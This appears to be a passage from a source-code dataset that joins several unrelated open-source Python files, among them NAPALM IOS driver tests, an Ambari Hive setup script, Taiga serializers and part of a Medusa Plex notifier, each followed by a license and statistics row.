)
self.assertTrue(valid_file)
invalid_file = self.device._check_file_exists(
self.device.dest_file_system + "/bogus_999.txt"
)
self.assertFalse(invalid_file)
class TestGetterIOSDriver(unittest.TestCase, TestGettersNetworkDriver):
"""Getters Tests for IOSDriver.
Get operations:
get_lldp_neighbors
get_facts
get_interfaces
get_bgp_neighbors
get_interfaces_counters
"""
@classmethod
def setUpClass(cls):
"""Executed when the class is instantiated."""
cls.mock = True
username = "vagrant"
ip_addr = "192.168.0.234"
password = "vagrant"
cls.vendor = "ios"
optional_args = {}
optional_args["dest_file_system"] = "flash:"
cls.device = ios.IOSDriver(
ip_addr, username, password, optional_args=optional_args
)
if cls.mock:
cls.device.device = FakeIOSDevice()
else:
cls.device.open()
def test_ios_only_bgp_time_conversion(self):
"""Verify time conversion static method."""
test_cases = {
"1w0d": 604800,
"00:14:23": 863,
"00:13:40": 820,
"00:00:21": 21,
"00:00:13": 13,
"00:00:49": 49,
"1d11h": 126000,
"1d17h": 147600,
"8w5d": 5270400,
"1y28w": 48470400,
"never": -1,
}
for bgp_time, result in test_cases.items():
self.assertEqual(self.device.bgp_time_conversion(bgp_time), result)
class FakeIOSDevice:
"""Class to fake a IOS Device."""
@staticmethod
def read_txt_file(filename):
"""Read a txt file and return its content."""
with open(filename) as data_file:
return data_file.read()
def send_command_expect(self, command, **kwargs):
"""Fake execute a command in the device by just returning the content of a file."""
cmd = re.sub(r"[\[\]\*\^\+\s\|]", "_", command)
output = self.read_txt_file("ios/mock_data/{}.txt".format(cmd))
return str(output)
def send_command(self, command, **kwargs):
"""Fake execute a command in the device by just returning the content of a file."""
return self.send_command_expect(command)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -1,167,232,957,800,592,000 | 32.753846 | 91 | 0.614707 | false | 3.94841 | true | false | false |
emulbreh/vacuous | vacuous/backends/dulwich/tasks.py | 1 | 1530 | from StringIO import StringIO
from celery.task import Task
from celery.task.sets import TaskSet, subtask
from dulwich.protocol import ReceivableProtocol
from dulwich.server import ReceivePackHandler
from vacuous.backends import load_backend
from vacuous.backends.dulwich.utils import WebBackend
from vacuous.tasks import SyncTask
class _ReceivePackHandler(ReceivePackHandler):
def _apply_pack(self, refs):
result = super(_ReceivePackHandler, self)._apply_pack(refs)
status = dict(result)
self._good_refs = []
for oldsha, newsha, ref in refs:
if status[ref] == 'ok':
self._good_refs.append((oldsha, newsha, ref))
return result
class ReceivePackTask(Task):
def run(self, flavor, repo_path, data):
backend = load_backend(flavor, repo_path, cache=False)
out = StringIO()
proto = ReceivableProtocol(StringIO(data).read, out.write)
handler = _ReceivePackHandler(WebBackend(), [backend], proto, stateless_rpc=True)
handler.handle()
sync_tasks = []
for oldrev, newrev, name in handler._good_refs:
if name.startswith('refs/heads/'):
branch = name[11:]
sync_tasks.append(subtask(SyncTask, args=[backend.flavor, backend.path, oldrev, newrev, branch]))
if sync_tasks:
taskset = TaskSet(tasks=sync_tasks)
taskset.apply_async().join()
return out.getvalue(), handler._good_refs
| mit | -4,407,668,046,472,185,000 | 33.772727 | 113 | 0.640523 | false | 3.963731 | false | false | false |
hashimmm/iiifoo | testutils/manifest_validator.py | 1 | 3963 | from testutils.presentation_api.implementations.manifest_factory.loader import \
ManifestReader
from iiifoo_utils import image_id_from_canvas_id
def validate(manifestjson, logger=None):
"""Validate a given manifest json object."""
mr = ManifestReader(manifestjson)
try:
r = mr.read()
js = r.toJSON()
except Exception as e:
if logger:
logger.exception(e)
print e
valid = False
else:
valid = True
print mr.get_warnings()
if logger:
logger.warn(mr.get_warnings())
return valid
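
# Illustrative usage sketch (not part of the original module):
#   with open('manifest.json') as f:   # hypothetical manifest file
#       is_valid = validate(json.load(f))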
def assert_equal(first, second):
assert first == second, \
"%s != %s" % (first, second)
def ensure_manifest_details_integrity(detailsobj, manifest_json, start=0):
sequences = manifest_json['sequences']
canvases = sequences[0]['canvases']
no_of_images = len(detailsobj['images'])
assert_equal(len(sequences), 1)
assert_equal(len(canvases), no_of_images + start)
for i in xrange(start, start+no_of_images):
assert_equal(canvases[i]['label'],
detailsobj['images'][i-start]['name'])
assert_equal(canvases[i]['width'],
detailsobj['images'][i-start]['width'])
assert_equal(canvases[i]['height'],
detailsobj['images'][i-start]['height'])
image_resource = canvases[i]['images'][0]['resource']
assert_equal(image_resource['service']['@id'],
detailsobj['images'][i-start]['path'])
assert_equal(image_resource['width'],
detailsobj['images'][i-start]['width'])
assert_equal(image_resource['height'],
detailsobj['images'][i-start]['height'])
def ensure_manifest_schema_conformance(manifest_json):
assert validate(manifest_json), \
"Manifest json: \n%s\n is invalid" % manifest_json
def check_updated_details(manifest_json, details):
sequences = manifest_json['sequences']
canvases = sequences[0]['canvases']
new_image_ids = [image['image_id'] for image in details['images']]
updated_canvases = [canvas for canvas in canvases
if image_id_from_canvas_id(canvas["@id"])
in new_image_ids]
updated_canvases = {image_id_from_canvas_id(canvas["@id"]): canvas
for canvas in updated_canvases}
assert_equal(manifest_json['label'], details['manifest_label'])
for image_id in new_image_ids:
canvas = updated_canvases[image_id]
image = [image for image in details['images']
if image['image_id'] == image_id][0]
assert_equal(canvas['label'], image['name'])
assert_equal(canvas['width'], image['width'])
assert_equal(canvas['height'], image['height'])
image_resource = canvas['images'][0]['resource']
assert_equal(image_resource['service']['@id'], image['path'])
assert_equal(image_resource['width'], image['width'])
assert_equal(image_resource['height'], image['height'])
def check_annotations_in_list(annotation_list, imageobj):
resources = annotation_list['resources']
relevant_resources = []
for resource in resources:
if image_id_from_canvas_id(resource['on']) == imageobj['image_id']:
relevant_resources.append(resource)
list_comments = [item['resource']['chars'] for item in resources
if item['motivation'] == "oa:commenting"]
list_transcriptions = [item['resource']['chars'] for item in resources
if item['resource']['@type'] == "cnt:ContentAsText"]
for comment in imageobj.get('comments', []):
assert comment['text'] in list_comments, \
"Comment %s not found" % comment['text']
for transcription in imageobj.get('transcriptions', []):
assert transcription['text'] in list_transcriptions, \
"Comment %s not found" % transcription['text']
| mit | 5,603,357,598,368,924,000 | 40.715789 | 80 | 0.607368 | false | 3.966967 | false | false | false |
radicalbit/ambari | ambari-server/src/main/resources/common-services/HIVE/0.12.0.2.0/package/scripts/hive.py | 1 | 23158 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import glob
from urlparse import urlparse
from resource_management.libraries.script.script import Script
from resource_management.libraries.resources.hdfs_resource import HdfsResource
from resource_management.libraries.functions.copy_tarball import copy_to_hdfs
from resource_management.libraries.functions.get_config import get_config
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.core.resources.service import ServiceConfig
from resource_management.core.resources.system import File, Execute, Directory
from resource_management.core.source import StaticFile, Template, DownloadSource, InlineTemplate
from resource_management.core.shell import as_user
from resource_management.libraries.functions.is_empty import is_empty
from resource_management.libraries.resources.xml_config import XmlConfig
from resource_management.libraries.functions.format import format
from resource_management.core.exceptions import Fail
from resource_management.core.shell import as_sudo
from resource_management.core.shell import quote_bash_args
from resource_management.core.logger import Logger
from resource_management.core import utils
from resource_management.libraries.functions.setup_atlas_hook import has_atlas_in_cluster, setup_atlas_hook
from resource_management.libraries.functions.security_commons import update_credential_provider_path
from ambari_commons.constants import SERVICE
from ambari_commons.os_family_impl import OsFamilyFuncImpl, OsFamilyImpl
from ambari_commons import OSConst
@OsFamilyFuncImpl(os_family=OsFamilyImpl.DEFAULT)
def hive(name=None):
import params
hive_client_conf_path = format("{stack_root}/current/{component_directory}/conf")
# Permissions 644 for conf dir (client) files, and 600 for conf.server
mode_identified = 0644 if params.hive_config_dir == hive_client_conf_path else 0600
Directory(params.hive_etc_dir_prefix,
mode=0755
)
# We should change configurations for client as well as for server.
# The reason is that stale-configs are service-level, not component.
Logger.info("Directories to fill with configs: %s" % str(params.hive_conf_dirs_list))
for conf_dir in params.hive_conf_dirs_list:
fill_conf_dir(conf_dir)
params.hive_site_config = update_credential_provider_path(params.hive_site_config,
'hive-site',
os.path.join(params.hive_conf_dir, 'hive-site.jceks'),
params.hive_user,
params.user_group
)
XmlConfig("hive-site.xml",
conf_dir=params.hive_config_dir,
configurations=params.hive_site_config,
configuration_attributes=params.config['configuration_attributes']['hive-site'],
owner=params.hive_user,
group=params.user_group,
mode=mode_identified)
# Generate atlas-application.properties.xml file
if params.enable_atlas_hook:
atlas_hook_filepath = os.path.join(params.hive_config_dir, params.atlas_hook_filename)
setup_atlas_hook(SERVICE.HIVE, params.hive_atlas_application_properties, atlas_hook_filepath, params.hive_user, params.user_group)
File(format("{hive_config_dir}/hive-env.sh"),
owner=params.hive_user,
group=params.user_group,
content=InlineTemplate(params.hive_env_sh_template),
mode=mode_identified
)
  # On some OSes this folder may not exist, so create it before pushing files there
Directory(params.limits_conf_dir,
create_parents = True,
owner='root',
group='root'
)
File(os.path.join(params.limits_conf_dir, 'hive.conf'),
owner='root',
group='root',
mode=0644,
content=Template("hive.conf.j2")
)
if params.security_enabled:
File(os.path.join(params.hive_config_dir, 'zkmigrator_jaas.conf'),
owner=params.hive_user,
group=params.user_group,
content=Template("zkmigrator_jaas.conf.j2")
)
File(format("/usr/lib/ambari-agent/{check_db_connection_jar_name}"),
content = DownloadSource(format("{jdk_location}{check_db_connection_jar_name}")),
mode = 0644,
)
if name != "client":
setup_non_client()
if name == 'hiveserver2':
setup_hiveserver2()
if name == 'metastore':
setup_metastore()
def setup_hiveserver2():
import params
File(params.start_hiveserver2_path,
mode=0755,
content=Template(format('{start_hiveserver2_script}'))
)
File(os.path.join(params.hive_server_conf_dir, "hadoop-metrics2-hiveserver2.properties"),
owner=params.hive_user,
group=params.user_group,
content=Template("hadoop-metrics2-hiveserver2.properties.j2"),
mode=0600
)
XmlConfig("hiveserver2-site.xml",
conf_dir=params.hive_server_conf_dir,
configurations=params.config['configurations']['hiveserver2-site'],
configuration_attributes=params.config['configuration_attributes']['hiveserver2-site'],
owner=params.hive_user,
group=params.user_group,
mode=0600)
# copy tarball to HDFS feature not supported
if not (params.stack_version_formatted_major and check_stack_feature(StackFeature.COPY_TARBALL_TO_HDFS, params.stack_version_formatted_major)):
params.HdfsResource(params.webhcat_apps_dir,
type="directory",
action="create_on_execute",
owner=params.webhcat_user,
mode=0755
)
# Create webhcat dirs.
if params.hcat_hdfs_user_dir != params.webhcat_hdfs_user_dir:
params.HdfsResource(params.hcat_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.webhcat_user,
mode=params.hcat_hdfs_user_mode
)
params.HdfsResource(params.webhcat_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.webhcat_user,
mode=params.webhcat_hdfs_user_mode
)
# ****** Begin Copy Tarballs ******
# *********************************
  # if the copy-tarball-to-HDFS feature is supported, copy mapreduce.tar.gz and tez.tar.gz to HDFS
if params.stack_version_formatted_major and check_stack_feature(StackFeature.COPY_TARBALL_TO_HDFS, params.stack_version_formatted_major):
copy_to_hdfs("mapreduce", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs)
copy_to_hdfs("tez", params.user_group, params.hdfs_user, skip=params.sysprep_skip_copy_tarballs_hdfs)
# Always copy pig.tar.gz and hive.tar.gz using the appropriate mode.
  # This can use a different source and dest location to account for the custom source and destination files.
copy_to_hdfs("pig",
params.user_group,
params.hdfs_user,
file_mode=params.tarballs_mode,
custom_source_file=params.pig_tar_source,
custom_dest_file=params.pig_tar_dest_file,
skip=params.sysprep_skip_copy_tarballs_hdfs)
copy_to_hdfs("hive",
params.user_group,
params.hdfs_user,
file_mode=params.tarballs_mode,
custom_source_file=params.hive_tar_source,
custom_dest_file=params.hive_tar_dest_file,
skip=params.sysprep_skip_copy_tarballs_hdfs)
wildcard_tarballs = ["sqoop", "hadoop_streaming"]
for tarball_name in wildcard_tarballs:
source_file_pattern = eval("params." + tarball_name + "_tar_source")
dest_dir = eval("params." + tarball_name + "_tar_dest_dir")
if source_file_pattern is None or dest_dir is None:
continue
source_files = glob.glob(source_file_pattern) if "*" in source_file_pattern else [source_file_pattern]
for source_file in source_files:
src_filename = os.path.basename(source_file)
dest_file = os.path.join(dest_dir, src_filename)
copy_to_hdfs(tarball_name,
params.user_group,
params.hdfs_user,
file_mode=params.tarballs_mode,
custom_source_file=source_file,
custom_dest_file=dest_file,
skip=params.sysprep_skip_copy_tarballs_hdfs)
# ******* End Copy Tarballs *******
# *********************************
# if warehouse directory is in DFS
if not params.whs_dir_protocol or params.whs_dir_protocol == urlparse(params.default_fs).scheme:
# Create Hive Metastore Warehouse Dir
params.HdfsResource(params.hive_apps_whs_dir,
type="directory",
action="create_on_execute",
owner=params.hive_user,
group=params.user_group,
mode=params.hive_apps_whs_mode
)
else:
Logger.info(format("Not creating warehouse directory '{hive_apps_whs_dir}', as the location is not in DFS."))
# Create Hive User Dir
params.HdfsResource(params.hive_hdfs_user_dir,
type="directory",
action="create_on_execute",
owner=params.hive_user,
mode=params.hive_hdfs_user_mode
)
if not is_empty(params.hive_exec_scratchdir) and not urlparse(params.hive_exec_scratchdir).path.startswith("/tmp"):
params.HdfsResource(params.hive_exec_scratchdir,
type="directory",
action="create_on_execute",
owner=params.hive_user,
group=params.hdfs_user,
mode=0777) # Hive expects this dir to be writeable by everyone as it is used as a temp dir
params.HdfsResource(None, action="execute")
def setup_non_client():
import params
Directory(params.hive_pid_dir,
create_parents = True,
cd_access='a',
owner=params.hive_user,
group=params.user_group,
mode=0755)
Directory(params.hive_log_dir,
create_parents = True,
cd_access='a',
owner=params.hive_user,
group=params.user_group,
mode=0755)
Directory(params.hive_var_lib,
create_parents = True,
cd_access='a',
owner=params.hive_user,
group=params.user_group,
mode=0755)
if params.hive_jdbc_target is not None and not os.path.exists(params.hive_jdbc_target):
jdbc_connector(params.hive_jdbc_target, params.hive_previous_jdbc_jar)
if params.hive2_jdbc_target is not None and not os.path.exists(params.hive2_jdbc_target):
jdbc_connector(params.hive2_jdbc_target, params.hive2_previous_jdbc_jar)
def setup_metastore():
import params
if params.hive_metastore_site_supported:
hivemetastore_site_config = get_config("hivemetastore-site")
if hivemetastore_site_config:
XmlConfig("hivemetastore-site.xml",
conf_dir=params.hive_server_conf_dir,
configurations=params.config['configurations']['hivemetastore-site'],
configuration_attributes=params.config['configuration_attributes']['hivemetastore-site'],
owner=params.hive_user,
group=params.user_group,
mode=0600)
File(os.path.join(params.hive_server_conf_dir, "hadoop-metrics2-hivemetastore.properties"),
owner=params.hive_user,
group=params.user_group,
content=Template("hadoop-metrics2-hivemetastore.properties.j2"),
mode=0600
)
File(params.start_metastore_path,
mode=0755,
content=StaticFile('startMetastore.sh')
)
if not is_empty(params.hive_exec_scratchdir):
dirPathStr = urlparse(params.hive_exec_scratchdir).path
pathComponents = dirPathStr.split("/")
if dirPathStr.startswith("/tmp") and len(pathComponents) > 2:
Directory (params.hive_exec_scratchdir,
owner = params.hive_user,
create_parents = True,
mode=0777)
def create_metastore_schema():
import params
create_schema_cmd = format("export HIVE_CONF_DIR={hive_server_conf_dir} ; "
"{hive_schematool_bin}/schematool -initSchema "
"-dbType {hive_metastore_db_type} "
"-userName {hive_metastore_user_name} "
"-passWord {hive_metastore_user_passwd!p} -verbose")
check_schema_created_cmd = as_user(format("export HIVE_CONF_DIR={hive_server_conf_dir} ; "
"{hive_schematool_bin}/schematool -info "
"-dbType {hive_metastore_db_type} "
"-userName {hive_metastore_user_name} "
"-passWord {hive_metastore_user_passwd!p} -verbose"), params.hive_user)
# HACK: in cases with quoted passwords and as_user (which does the quoting as well) !p won't work for hiding passwords.
# Fixing it with the hack below:
quoted_hive_metastore_user_passwd = quote_bash_args(quote_bash_args(params.hive_metastore_user_passwd))
if quoted_hive_metastore_user_passwd[0] == "'" and quoted_hive_metastore_user_passwd[-1] == "'" \
or quoted_hive_metastore_user_passwd[0] == '"' and quoted_hive_metastore_user_passwd[-1] == '"':
quoted_hive_metastore_user_passwd = quoted_hive_metastore_user_passwd[1:-1]
Logger.sensitive_strings[repr(check_schema_created_cmd)] = repr(check_schema_created_cmd.replace(
format("-passWord {quoted_hive_metastore_user_passwd}"), "-passWord " + utils.PASSWORDS_HIDE_STRING))
Execute(create_schema_cmd,
not_if = check_schema_created_cmd,
user = params.hive_user
)
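
# Illustrative note (an assumption, not from the original script): the rendered
# command looks roughly like
#   schematool -initSchema -dbType mysql -userName hive -passWord <hidden> -verbose
# and the !p flag in the format() calls above marks the password so it can be
# masked in Ambari's command output.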
"""
Writes configuration files required by Hive.
"""
def fill_conf_dir(component_conf_dir):
import params
hive_client_conf_path = os.path.realpath(format("{stack_root}/current/{component_directory}/conf"))
component_conf_dir = os.path.realpath(component_conf_dir)
mode_identified_for_file = 0644 if component_conf_dir == hive_client_conf_path else 0600
mode_identified_for_dir = 0755 if component_conf_dir == hive_client_conf_path else 0700
Directory(component_conf_dir,
owner=params.hive_user,
group=params.user_group,
create_parents = True,
mode=mode_identified_for_dir
)
if 'mapred-site' in params.config['configurations']:
XmlConfig("mapred-site.xml",
conf_dir=component_conf_dir,
configurations=params.config['configurations']['mapred-site'],
configuration_attributes=params.config['configuration_attributes']['mapred-site'],
owner=params.hive_user,
group=params.user_group,
mode=mode_identified_for_file)
File(format("{component_conf_dir}/hive-default.xml.template"),
owner=params.hive_user,
group=params.user_group,
mode=mode_identified_for_file
)
File(format("{component_conf_dir}/hive-env.sh.template"),
owner=params.hive_user,
group=params.user_group,
mode=mode_identified_for_file
)
# Create hive-log4j.properties and hive-exec-log4j.properties
# in /etc/hive/conf and not in /etc/hive2/conf
if params.log4j_version == '1':
log4j_exec_filename = 'hive-exec-log4j.properties'
if (params.log4j_exec_props != None):
File(format("{component_conf_dir}/{log4j_exec_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=InlineTemplate(params.log4j_exec_props)
)
elif (os.path.exists("{component_conf_dir}/{log4j_exec_filename}.template")):
File(format("{component_conf_dir}/{log4j_exec_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=StaticFile(format("{component_conf_dir}/{log4j_exec_filename}.template"))
)
log4j_filename = 'hive-log4j.properties'
if (params.log4j_props != None):
File(format("{component_conf_dir}/{log4j_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=InlineTemplate(params.log4j_props)
)
elif (os.path.exists("{component_conf_dir}/{log4j_filename}.template")):
File(format("{component_conf_dir}/{log4j_filename}"),
mode=mode_identified_for_file,
group=params.user_group,
owner=params.hive_user,
content=StaticFile(format("{component_conf_dir}/{log4j_filename}.template"))
)
if params.parquet_logging_properties is not None:
File(format("{component_conf_dir}/parquet-logging.properties"),
mode = mode_identified_for_file,
group = params.user_group,
owner = params.hive_user,
content = params.parquet_logging_properties)
def jdbc_connector(target, hive_previous_jdbc_jar):
"""
Shared by Hive Batch, Hive Metastore, and Hive Interactive
:param target: Target of jdbc jar name, which could be for any of the components above.
"""
import params
if not params.jdbc_jar_name:
return
if params.hive_jdbc_driver in params.hive_jdbc_drivers_list and params.hive_use_existing_db:
environment = {
"no_proxy": format("{ambari_server_hostname}")
}
if hive_previous_jdbc_jar and os.path.isfile(hive_previous_jdbc_jar):
File(hive_previous_jdbc_jar, action='delete')
    # TODO: should be removed once ranger_hive_plugin no longer provides the jdbc driver
if params.prepackaged_jdbc_name != params.jdbc_jar_name:
Execute(('rm', '-f', params.prepackaged_ojdbc_symlink),
path=["/bin", "/usr/bin/"],
sudo = True)
File(params.downloaded_custom_connector,
content = DownloadSource(params.driver_curl_source))
    # it might be more correct to branch on the db type here
if params.sqla_db_used:
untar_sqla_type2_driver = ('tar', '-xvf', params.downloaded_custom_connector, '-C', params.tmp_dir)
Execute(untar_sqla_type2_driver, sudo = True)
Execute(format("yes | {sudo} cp {jars_path_in_archive} {hive_lib}"))
Directory(params.jdbc_libs_dir,
create_parents = True)
Execute(format("yes | {sudo} cp {libs_path_in_archive} {jdbc_libs_dir}"))
Execute(format("{sudo} chown -R {hive_user}:{user_group} {hive_lib}/*"))
else:
Execute(('cp', '--remove-destination', params.downloaded_custom_connector, target),
#creates=target, TODO: uncomment after ranger_hive_plugin will not provide jdbc
path=["/bin", "/usr/bin/"],
sudo = True)
else:
#for default hive db (Mysql)
Execute(('cp', '--remove-destination', format('/usr/share/java/{jdbc_jar_name}'), target),
#creates=target, TODO: uncomment after ranger_hive_plugin will not provide jdbc
path=["/bin", "/usr/bin/"],
sudo=True
)
pass
File(target,
mode = 0644,
)
@OsFamilyFuncImpl(os_family=OSConst.WINSRV_FAMILY)
def hive(name=None):
import params
XmlConfig("hive-site.xml",
conf_dir = params.hive_conf_dir,
configurations = params.config['configurations']['hive-site'],
owner=params.hive_user,
configuration_attributes=params.config['configuration_attributes']['hive-site']
)
if name in ["hiveserver2","metastore"]:
# Manually overriding service logon user & password set by the installation package
service_name = params.service_map[name]
ServiceConfig(service_name,
action="change_user",
username = params.hive_user,
password = Script.get_password(params.hive_user))
Execute(format("cmd /c hadoop fs -mkdir -p {hive_warehouse_dir}"), logoutput=True, user=params.hadoop_user)
if name == 'metastore':
if params.init_metastore_schema:
check_schema_created_cmd = format('cmd /c "{hive_bin}\\hive.cmd --service schematool -info '
'-dbType {hive_metastore_db_type} '
'-userName {hive_metastore_user_name} '
'-passWord {hive_metastore_user_passwd!p}'
'&set EXITCODE=%ERRORLEVEL%&exit /B %EXITCODE%"', #cmd "feature", propagate the process exit code manually
hive_bin=params.hive_bin,
hive_metastore_db_type=params.hive_metastore_db_type,
hive_metastore_user_name=params.hive_metastore_user_name,
hive_metastore_user_passwd=params.hive_metastore_user_passwd)
try:
Execute(check_schema_created_cmd)
except Fail:
create_schema_cmd = format('cmd /c {hive_bin}\\hive.cmd --service schematool -initSchema '
'-dbType {hive_metastore_db_type} '
'-userName {hive_metastore_user_name} '
'-passWord {hive_metastore_user_passwd!p}',
hive_bin=params.hive_bin,
hive_metastore_db_type=params.hive_metastore_db_type,
hive_metastore_user_name=params.hive_metastore_user_name,
hive_metastore_user_passwd=params.hive_metastore_user_passwd)
Execute(create_schema_cmd,
user = params.hive_user,
logoutput=True
)
if name == "hiveserver2":
if params.hive_execution_engine == "tez":
# Init the tez app dir in hadoop
script_file = __file__.replace('/', os.sep)
cmd_file = os.path.normpath(os.path.join(os.path.dirname(script_file), "..", "files", "hiveTezSetup.cmd"))
Execute("cmd /c " + cmd_file, logoutput=True, user=params.hadoop_user)
| apache-2.0 | -4,470,074,220,140,164,000 | 42.205224 | 147 | 0.630883 | false | 3.822083 | true | false | false |
seanchen/taiga-back | taiga/users/serializers.py | 1 | 5786 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core import validators
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from taiga.base.api import serializers
from taiga.base.fields import PgArrayField
from taiga.projects.models import Project
from .models import User, Role
from .services import get_photo_or_gravatar_url, get_big_photo_or_gravatar_url
import re
######################################################
## User
######################################################
class ContactProjectDetailSerializer(serializers.ModelSerializer):
class Meta:
model = Project
fields = ("id", "slug", "name")
class UserSerializer(serializers.ModelSerializer):
full_name_display = serializers.SerializerMethodField("get_full_name_display")
photo = serializers.SerializerMethodField("get_photo")
big_photo = serializers.SerializerMethodField("get_big_photo")
roles = serializers.SerializerMethodField("get_roles")
projects_with_me = serializers.SerializerMethodField("get_projects_with_me")
class Meta:
model = User
# IMPORTANT: Maintain the UserAdminSerializer Meta up to date
# with this info (including there the email)
fields = ("id", "username", "full_name", "full_name_display",
"color", "bio", "lang", "theme", "timezone", "is_active",
"photo", "big_photo", "roles", "projects_with_me")
read_only_fields = ("id",)
def validate_username(self, attrs, source):
value = attrs[source]
validator = validators.RegexValidator(re.compile('^[\w.-]+$'), _("invalid username"),
_("invalid"))
try:
validator(value)
except ValidationError:
raise serializers.ValidationError(_("Required. 255 characters or fewer. Letters, "
"numbers and /./-/_ characters'"))
if (self.object and
self.object.username != value and
User.objects.filter(username=value).exists()):
raise serializers.ValidationError(_("Invalid username. Try with a different one."))
return attrs
def get_full_name_display(self, obj):
return obj.get_full_name() if obj else ""
def get_photo(self, user):
return get_photo_or_gravatar_url(user)
def get_big_photo(self, user):
return get_big_photo_or_gravatar_url(user)
def get_roles(self, user):
        return user.memberships.order_by("role__name").values_list("role__name", flat=True).distinct()
def get_projects_with_me(self, user):
request = self.context.get("request", None)
requesting_user = request and request.user or None
if not requesting_user or not requesting_user.is_authenticated():
return []
else:
project_ids = requesting_user.memberships.values_list("project__id", flat=True)
memberships = user.memberships.filter(project__id__in=project_ids)
project_ids = memberships.values_list("project__id", flat=True)
projects = Project.objects.filter(id__in=project_ids)
return ContactProjectDetailSerializer(projects, many=True).data
class UserAdminSerializer(UserSerializer):
class Meta:
model = User
# IMPORTANT: Maintain the UserSerializer Meta up to date
# with this info (including here the email)
fields = ("id", "username", "full_name", "full_name_display", "email",
"color", "bio", "lang", "theme", "timezone", "is_active", "photo",
"big_photo")
read_only_fields = ("id", "email")
class BasicInfoSerializer(UserSerializer):
class Meta:
model = User
fields = ("username", "full_name_display","photo", "big_photo")
class RecoverySerializer(serializers.Serializer):
token = serializers.CharField(max_length=200)
password = serializers.CharField(min_length=6)
class ChangeEmailSerializer(serializers.Serializer):
email_token = serializers.CharField(max_length=200)
class CancelAccountSerializer(serializers.Serializer):
cancel_token = serializers.CharField(max_length=200)
######################################################
## Role
######################################################
class RoleSerializer(serializers.ModelSerializer):
members_count = serializers.SerializerMethodField("get_members_count")
permissions = PgArrayField(required=False)
class Meta:
model = Role
fields = ('id', 'name', 'permissions', 'computable', 'project', 'order', 'members_count')
i18n_fields = ("name",)
def get_members_count(self, obj):
return obj.memberships.count()
class ProjectRoleSerializer(serializers.ModelSerializer):
class Meta:
model = Role
fields = ('id', 'name', 'slug', 'order', 'computable')
i18n_fields = ("name",)
| agpl-3.0 | 3,606,832,449,048,560,600 | 37.56 | 103 | 0.639523 | false | 4.182213 | false | false | false |
FireBladeNooT/Medusa_1_6 | medusa/notifiers/plex.py | 1 | 10632 | # coding=utf-8
# Author: Dustyn Gibson <[email protected]>
#
# This file is part of Medusa.
#
# Medusa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Medusa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Medusa. If not, see <http://www.gnu.org/licenses/>.
import re
from six import iteritems
from .. import app, common, logger
from ..helper.exceptions import ex
from ..helpers import getURL, make_session
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
class Notifier(object):
def __init__(self):
self.headers = {
'X-Plex-Device-Name': 'Medusa',
'X-Plex-Product': 'Medusa Notifier',
'X-Plex-Client-Identifier': common.USER_AGENT,
'X-Plex-Version': '2016.02.10'
}
self.session = make_session()
@staticmethod
def _notify_pht(message, title='Medusa', host=None, username=None, password=None, force=False): # pylint: disable=too-many-arguments
"""Internal wrapper for the notify_snatch and notify_download functions
Args:
message: Message body of the notice to send
title: Title of the notice to send
host: Plex Home Theater(s) host:port
username: Plex username
password: Plex password
force: Used for the Test method to override config safety checks
Returns:
            Returns a list of results in the format of host:ip:result
            The result will either be 'OK' or False; this is meant to be parsed by the calling function.
"""
from . import kodi_notifier
# suppress notifications if the notifier is disabled but the notify options are checked
if not app.USE_PLEX_CLIENT and not force:
return False
host = host or app.PLEX_CLIENT_HOST
username = username or app.PLEX_CLIENT_USERNAME
password = password or app.PLEX_CLIENT_PASSWORD
return kodi_notifier._notify_kodi(message, title=title, host=host, username=username, password=password, force=force, dest_app="PLEX") # pylint: disable=protected-access
##############################################################################
# Public functions
##############################################################################
def notify_snatch(self, ep_name, is_proper):
if app.PLEX_NOTIFY_ONSNATCH:
self._notify_pht(ep_name, common.notifyStrings[(common.NOTIFY_SNATCH, common.NOTIFY_SNATCH_PROPER)[is_proper]])
def notify_download(self, ep_name):
if app.PLEX_NOTIFY_ONDOWNLOAD:
self._notify_pht(ep_name, common.notifyStrings[common.NOTIFY_DOWNLOAD])
def notify_subtitle_download(self, ep_name, lang):
if app.PLEX_NOTIFY_ONSUBTITLEDOWNLOAD:
self._notify_pht(ep_name + ': ' + lang, common.notifyStrings[common.NOTIFY_SUBTITLE_DOWNLOAD])
def notify_git_update(self, new_version='??'):
if app.NOTIFY_ON_UPDATE:
update_text = common.notifyStrings[common.NOTIFY_GIT_UPDATE_TEXT]
title = common.notifyStrings[common.NOTIFY_GIT_UPDATE]
if update_text and title and new_version:
self._notify_pht(update_text + new_version, title)
def notify_login(self, ipaddress=""):
